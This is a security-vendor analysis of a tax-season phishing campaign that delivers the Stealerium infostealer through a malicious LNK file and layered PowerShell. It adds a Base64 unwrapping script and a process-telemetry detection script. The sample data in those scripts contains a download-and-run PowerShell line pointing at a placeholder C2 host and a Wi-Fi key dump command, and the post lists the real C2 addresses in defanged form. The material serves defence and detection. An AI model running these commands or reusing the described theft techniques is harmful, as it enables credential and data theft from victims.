Threat Actors are Targeting US Tax-Session with new Tactics of Stealerium-infostealer
30 April 2025

Written by Dixit Panchal

Introduction

A security researcher from Seqrite Labs has uncovered a malicious campaign targeting U.S. citizens as Tax Day approaches on April 15. Seqrite Labs has identified multiple phishing attacks leveraging tax-related themes as a vector for social engineering, aiming to exfiltrate user credentials and deploy malware. These campaigns predominantly utilize redirection techniques, such as phishing emails, and exploit malicious LNK files to further their objectives.

Each year, cybercriminals exploit the tax season as an opportunity to deploy various social engineering tactics to compromise sensitive personal and financial data. These adversaries craft highly deceptive campaigns designed to trick taxpayers into divulging confidential information, making fraudulent payments to counterfeit services, or inadvertently installing malicious payloads on their devices, thereby exposing them to identity theft and financial loss.

Infection Chain:

Fig 1: Infection chain

Initial analysis of the campaign:

While tax-season phishing attacks pose a risk to a broad spectrum of individuals, our analysis indicates that certain demographics are disproportionately vulnerable. Specifically, high-risk targets include individuals with limited knowledge of government tax processes, such as green card holders, small business owners, and new taxpayers.

Our findings reveal that threat actors are leveraging a sophisticated phishing technique in which they deliver files via email with deceptive extensions. One such example is a file named “104842599782-4.pdf.lnk,” which utilizes a malicious LNK extension. This tactic exploits user trust by masquerading as a legitimate document, ultimately leading to the execution of malicious payloads upon interaction.

Decoy Document:

Threat actors are disseminating a transcript related to tax sessions, targeting individuals through email by sharing it as a malicious attachment. These cybercriminals are leveraging this document as a vector to deliver harmful payloads, thereby compromising the security of the recipients.


Fig 2: Decoy Document

Technical Analysis:

We have retrieved the LNK file, identified as “104842599782-4.pdf.lnk,” which was utilized in the attack. This LNK file embeds a Base64-encoded payload within its structure.

Fig 3: Inside LNK File

Upon decoding the string, we extracted a PowerShell command line that itself contains another Base64-encoded payload embedded within it.

Fig 4: Encoded PowerShell Command Line


Subsequently, upon decoding the nested Base64 string, we uncovered the final PowerShell command line embedded within the payload.

Fig 5: Decoded Command Line

The extracted PowerShell command line initiated the download of rev_pf2_yas.txt, which itself is a PowerShell script (Payload.ps1) containing yet another Base64-encoded payload embedded within it.

Fig 6: 2nd PowerShell command with Base64 Encoded

Decoding the above Base64-encoded command line yields the final executable command shown below.

Fig 7: Decoded PowerShell Command

According to the PowerShell command line, the script Payload.ps1 (or rev_pf2_yas.txt) initiated the download of an additional file, revolaomt.rar, from the Command and Control (C2) server. This archive contained a malicious executable, named either Setup.exe or revolaomt.exe.
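The unwrapping described above (a double-extension LNK name, a Base64 -EncodedCommand, then a nested FromBase64String blob that fetches the next stage) is easy to automate for triage. The following Python script is an added example written for this article, not tooling from Seqrite Labs or from the campaign: the sample command line, the host c2.example.invalid, and the extension lists are constructed for the demo, and only the rev_pf2_yas.txt filename and the LNK name come from the report.

```python
import base64
import re

# Extension lists are assumptions for this example, not taken from the report.
DOC_LIKE_EXT = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".txt", ".jpg", ".png"}
RISKY_FINAL_EXT = {".lnk", ".exe", ".scr", ".js", ".vbs", ".hta", ".bat", ".cmd"}

# PowerShell's -e / -ec / -enc / -EncodedCommand takes Base64 of a UTF-16LE string.
ENC_FLAG = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)
# [Convert]::FromBase64String('...') as used for the nested stage.
FROM_B64 = re.compile(r"FromBase64String\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)", re.IGNORECASE)
URL_RE = re.compile(r"https?://[^\s'\"()<>]+", re.IGNORECASE)


def is_masquerading_attachment(name):
    """True for a document-looking name whose real (last) extension is executable,
    e.g. '104842599782-4.pdf.lnk' from the campaign."""
    parts = name.lower().rsplit(".", 2)
    if len(parts) < 3:
        return False
    inner, outer = "." + parts[1], "." + parts[2]
    return outer in RISKY_FINAL_EXT and inner in DOC_LIKE_EXT


def _decode_blob(token, utf16=False):
    """Base64-decode a token; treat it as UTF-16LE when told so or when NULs are present."""
    raw = base64.b64decode(token)
    if utf16 or b"\x00" in raw:
        return raw.decode("utf-16le", errors="replace")
    return raw.decode("utf-8", errors="replace")


def unwrap_stages(command_line, max_depth=10):
    """Peel nested Base64 layers out of a PowerShell command line.
    Returns the decoded stages in order, innermost last."""
    stages = []
    current = command_line
    for _ in range(max_depth):
        m = ENC_FLAG.search(current)
        if m:
            nxt = _decode_blob(m.group(1), utf16=True)
        else:
            m = FROM_B64.search(current)
            if not m:
                break
            nxt = _decode_blob(m.group(1))
        stages.append(nxt)
        current = nxt
    return stages


def extract_urls(text):
    """Pull plain http(s) URLs (next-stage download locations) out of a decoded stage."""
    return URL_RE.findall(text)


def _b64(text, utf16=False):
    data = text.encode("utf-16le") if utf16 else text.encode("utf-8")
    return base64.b64encode(data).decode("ascii")


# Constructed sample chain modelled on the report; the host name is a placeholder.
STAGE2 = "IEX (New-Object Net.WebClient).DownloadString('http://c2.example.invalid/rev_pf2_yas.txt')"
STAGE1 = ('powershell -nop -w hidden -c "IEX ([Text.Encoding]::UTF8.GetString('
          "[Convert]::FromBase64String('" + _b64(STAGE2) + "')))\"")
SAMPLE_LNK_ARGS = "powershell.exe -enc " + _b64(STAGE1, utf16=True)

if __name__ == "__main__":
    print("masquerading:", is_masquerading_attachment("104842599782-4.pdf.lnk"))
    for i, stage in enumerate(unwrap_stages(SAMPLE_LNK_ARGS), 1):
        print(f"stage {i}: {stage[:80]}")
        print("  urls:", extract_urls(stage))
```

The two encodings differ on purpose: -EncodedCommand always carries UTF-16LE text, while FromBase64String blobs in droppers are usually UTF-8, so the decoder sniffs for NUL bytes before choosing. Feeding the LNK's argument string into unwrap_stages reproduces the three layers shown in Figs 4 to 7 and surfaces the download URL without executing anything.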

Detailed analysis of Setup.exe / revolaomt.exe:

Fig 8: Detect it Easy

Upon detailed examination of the Setup.exe binary, it was identified as a PyInstaller-packaged Python executable. Subsequent extraction and decompilation revealed embedded Python bytecode artifacts, including DCTYKS.pyc and additional Python module components.

Fig 9: PyInstaller-packaged Python executable
Fig 10: Inside DCTYKS.pyc

Upon analysis of the DCTYKS.pyc sample, it was determined that the file contains obfuscated or encrypted payload data, which is programmatically decrypted at runtime and subsequently executed, as illustrated in the figure above.

Fig 11: Encoded DCTYKS.pyc with Base64

Upon successful decryption of the script, it was observed that the sample embeds a Base64-encoded executable payload. The decrypted payload leverages process injection techniques to target mstsc.exe for execution. Further analysis of the second-stage payload revealed it to be a .NET-compiled binary.

Analysis 2nd Payload (Stealerium malware):

Fig 12: .NET Base Malware sample

The second-stage payload is identified as a .NET-based malware sample. Upon inspection of its class structures, methods, and overall functionality, the sample exhibits strong behavioural and structural similarities to the Stealerium malware family, specifically aligning with version 1.0.35.

Stealerium is an open-source information-stealing malware designed to exfiltrate sensitive data from web browsers, cryptocurrency wallets, and popular applications such as Discord, Steam, and Telegram. It performs extensive system reconnaissance by harvesting details including active processes, desktop screenshots, and available Wi-Fi network configurations. Additionally, the malware incorporates sophisticated anti-analysis mechanisms to identify execution within virtualized environments and detect the presence of debugging tools.

Anti-Analysis

Fig 13: Anti Analysis Techniques
Fig 14: GitHub URLs
Fig 15: Detecting Suspicious ENV

This AntiAnalysis class is part of the malware's logic for detecting sandboxes, virtual machines, emulators, suspicious processes, services, usernames, and more. It checks system attributes against blacklists fetched from online sources (GitHub). If a suspicious environment is detected, it logs the finding and may trigger self-destruction. This helps the malware avoid analysis in controlled or security research setups.

Mutex Creation

Fig 16: Mutex Creation

This MutexControl class prevents multiple instances of the malware from running at the same time. It tries to create a system-wide mutex using a name from Config.Mutex (QT1bm11ocWPx). If the mutex already exists, it means another instance is running, so it exits the process. If an error occurs during this check, it logs the error and exits too.

Fig 17: Configuration of StringsCrypt.DecryptConfig

It configures the necessary values by decrypting them with StringsCrypt.DecryptConfig. It handles the decryption of the server base URL and the WebSocket address. If enabled, it also decodes cryptocurrency wallet addresses from Base64 and decrypts them using AES-256 encryption.

Decrypted server base URL: “hxxp://91.211.249.142:7816”

Random Directory Creation

Fig 18: Random Directory Creation

The InitWorkDir() method generates a random subdirectory under %LOCALAPPDATA%, creates it if it doesn’t exist, and hides it for stealth purposes. This is likely used for storing data or maintaining persistence without detection.

In this sample, the random directory \AppData\Local\e9d3e2dd2788c322ffd2c9defddf7728 was created with the hidden attribute set.

Bot Registration

Fig 19: BOT Registration

The RegisterBot method initiates an HTTP POST request to register a bot instance, utilizing a unique hash identifier and an authorization token for authentication. It serializes the registration payload, appends the necessary HTTP headers, and logs the server response or any encountered exceptions. The method returns a boolean value—true upon successful execution, and false if an exception is raised during the process.

RequestUri: ‘http[:]//91[.]211[.]249[.]142:7816/api/bot/v1/register’


Stealer Activity From Browser:

Fig 20: Stealer activity from Browser

This component extracts browser-related data (passwords, cookies, credit cards, history, bookmarks, autofill) from a given user data profile path.

FileZilla Credentials stealer activity

Fig 21: FileZilla Credential Stealer activity

The above code is part of a password-stealing component targeting FileZilla, an FTP client.

Gaming Platform Data Extraction Modules

Fig 22: Gaming platform data extraction

This component under bt.Stub.Target.Gaming is designed to collect data from the following platforms:

  • BattleNet
  • Minecraft
  • Steam
  • Uplay

Each class likely implements routines to extract user data, game configurations, or sensitive files for exfiltration.

Fig 23: Checks for a Minecraft installation

It checks for a Minecraft installation and creates a save directory to exfiltrate various data like mods, files, versions, logs, and screenshots. It conditionally captures logs and screenshots based on the Config.GrabberModule setting.

Messenger Data Stealer Modules

It targets various communication platforms to extract user data or credentials from:

  • Discord
  • Element
  • ICQ
  • Outlook
  • Pidgin
  • Signal
  • Skype
  • Telegram
  • Tox

Below is one example, Outlook credential harvesting:

It targets specific registry keys associated with Outlook profiles to extract sensitive information like email addresses, server names, usernames, and passwords. It gathers data for multiple mail clients (SMTP, POP3, IMAP) and writes the collected information to a file (Outlook.txt).

Fig 24: Messenger Data Extraction


Webcam Screenshot Capture

This method attempts to take a snapshot with a connected webcam and saves the image as a JPEG file. If exactly one camera is connected, it sends a series of messages to capture the webcam image, which is then saved to the specified path (camera.jpg or a timestamped filename). The method is controlled by a configuration setting (Config.WebcamScreenshot).

Fig 25: Webcam Screenshot Capture

Wi-Fi Password Retrieval

It retrieves the Wi-Fi password for a given network profile by running the command netsh wlan show profile with the key revealed and extracting the password from the output. The output is filtered with findstr Key, and the matching line is split and trimmed to obtain the value.

Fig 26: Wi-Fi Password Retrieval
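Several behaviours described in this analysis leave a footprint in process-creation telemetry: the encoded PowerShell launch from the LNK, a downloaded binary started from a user-writable folder, mstsc.exe spawned by that binary as an injection host, and netsh wlan show profile with key=clear for the Wi-Fi secret. The Python below is an added example, not Seqrite detection content: the events are constructed, Sysmon-style records (the paths, PIDs, profile name and the HomeNet SSID are invented), the rule names are made up for the demo, and T1055 (Process Injection) is a MITRE ATT&CK ID that does not appear in the report's own TTP table.

```python
import re

# Constructed Sysmon-style process-creation events; not telemetry from the report.
SAMPLE_EVENTS = [
    {"pid": 4120, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmd": "powershell.exe -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
    {"pid": 4188, "image": r"C:\Users\u\AppData\Local\Temp\revolaomt.exe",
     "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "revolaomt.exe"},
    {"pid": 4190, "image": r"C:\Windows\System32\mstsc.exe",
     "parent": r"C:\Users\u\AppData\Local\Temp\revolaomt.exe", "cmd": "mstsc.exe"},
    {"pid": 4202, "image": r"C:\Windows\System32\netsh.exe",
     "parent": r"C:\Windows\System32\mstsc.exe",
     "cmd": 'netsh wlan show profile name="HomeNet" key=clear'},
    # benign: an administrator opening Remote Desktop from the shell
    {"pid": 4210, "image": r"C:\Windows\System32\mstsc.exe",
     "parent": r"C:\Windows\explorer.exe", "cmd": "mstsc.exe /v:server01"},
    # benign: listing profiles without asking for the key
    {"pid": 4215, "image": r"C:\Windows\System32\netsh.exe",
     "parent": r"C:\Windows\System32\cmd.exe", "cmd": "netsh wlan show profiles"},
]

# -e / -ec / -enc / -EncodedCommand followed by a Base64 blob (T1059.001).
ENCODED_PS = re.compile(r"\s-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}", re.IGNORECASE)
# Locations a phishing payload can write to without elevation (assumed list).
USER_WRITABLE = re.compile(r"\\(?:AppData|Temp|Downloads|Users\\Public)\\", re.IGNORECASE)
# Profile dump that reveals the stored Wi-Fi key (the report's Wi-Fi retrieval step).
NETSH_WIFI = re.compile(r"netsh\s+wlan\s+show\s+profile\b.*\bkey=clear\b", re.IGNORECASE)


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def detect(events):
    """Run the four rules over process-creation events.
    Returns (pid, rule_name, technique_id) tuples in event order."""
    findings = []
    for ev in events:
        img, parent, cmd = basename(ev["image"]), basename(ev["parent"]), ev["cmd"]
        if img == "powershell.exe" and ENCODED_PS.search(cmd):
            findings.append((ev["pid"], "encoded_powershell", "T1059.001"))
        # PowerShell writing and launching a binary from a user-writable directory
        if parent == "powershell.exe" and USER_WRITABLE.search(ev["image"]):
            findings.append((ev["pid"], "dropped_binary_from_powershell", "T1059.001"))
        # mstsc.exe is a legitimate RDP client; here it is started by a binary in Temp
        if img == "mstsc.exe" and USER_WRITABLE.search(ev["parent"]):
            findings.append((ev["pid"], "mstsc_from_user_writable_parent", "T1055"))
        if img == "netsh.exe" and NETSH_WIFI.search(cmd):
            findings.append((ev["pid"], "wifi_profile_key_dump", "T1016"))
    return findings


if __name__ == "__main__":
    for pid, rule, technique in detect(SAMPLE_EVENTS):
        print(f"pid {pid}: {rule} ({technique})")
```

The mstsc.exe rule keys on the parent rather than on the image, because the binary itself is signed and common; what is abnormal in this chain is a freshly downloaded executable in Temp starting it. The netsh rule likewise fires only on key=clear, so routine profile listing stays quiet.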

VPN Data Extraction

It targets various VPN applications to exfiltrate sensitive information such as login credentials:

  • NordVpn
  • OpenVpn
  • ProtonVpn

For example, it extracts and saves NordVPN credentials from the user.config file found in NordVPN installation directories. It looks for the “Username” and “Password” settings, decodes them, and writes them to a file (accounts.txt) in the specified savePath.

Fig 27: VPN Data Extraction

Porn Detection & Screenshot Capture

Fig 28: Porn Detection & Snapshot Captures.

It detects adult content by checking if the active window’s title contains specific keywords related to NSFW content (configured in Config.PornServices). If such content is detected, it triggers a screenshot capture.

Conclusion:

Based on our recent proactive threat analysis, we’ve identified that cybercriminals are actively targeting U.S. citizens around the tax filing period scheduled for April 15. These threat actors are leveraging the occasion to deploy Stealerium malware, using deceptive tactics to trick users.

Stealerium malware is designed to steal Personally Identifiable Information (PII) from infected devices and transmit it to attacker-controlled bots for further exploitation.

To safeguard your data and devices, we strongly recommend using Seqrite Endpoint Security, which provides advanced protection against such evolving threats.

Stay secure. Stay protected with Seqrite.

TTPs

Tactic             Technique ID   Name
Initial Access     T1566.001      Phishing: Spearphishing Attachment
Execution          T1059.001      Command and Scripting Interpreter: PowerShell
Evasion            T1140          Deobfuscate/Decode Files or Information
                   T1027          Obfuscated Files or Information
                   T1497          Virtualization/Sandbox Evasion
                   T1497.001      Virtualization/Sandbox Evasion: System Checks
Credential Access  T1555.003      Credentials from Password Stores: Credentials from Web Browsers
                   T1539          Steal Web Session Cookie
Discovery          T1217          Browser Information Discovery
                   T1016          System Network Configuration Discovery: Wi-Fi Discovery
Collection         T1113          Screen Capture
Exfiltration       T1567.004      Exfiltration Over Web Service: Exfiltration Over Webhook

Seqrite Protections:

  • HEUR:Trojan.Win32.PH
  • Trojan.49490.GC
  • trojan.49489.GC

IoCs:

File Name                                  SHA-256
Setup.exe / revolaomt.exe                  6a9889fee93128a9cdcb93d35a2fec9c6127905d14c0ceed14f5f1c4f58542b8
104842599782-4.pdf.lnk                     48328ce3a4b2c2413acb87a4d1f8c3b7238db826f313a25173ad5ad34632d9d7
payload_1.ps1 / fgrsdt_rev_hx4_ln_x.txt    10f217c72f62aed40957c438b865f0bcebc7e42a5e947051edee1649adf0cbf2
revolaomt.rar                              31705d906058e7324027e65ce7f4f7a30bcf6c30571aa3f020e91678a22a835a
104842599782-4.html                        ff5e3e3bf67d292c73491fab0d94533a712c2935bb4a9135546ca4a416ba8ca1

C2:

  • hxxp[:]//91[.]211[.]249[.]142:7816/
  • hxxp[:]//185[.]237[.]165[.]230/


Authors:

Dixit Panchal
Kartik Jivani
Soumen Burma
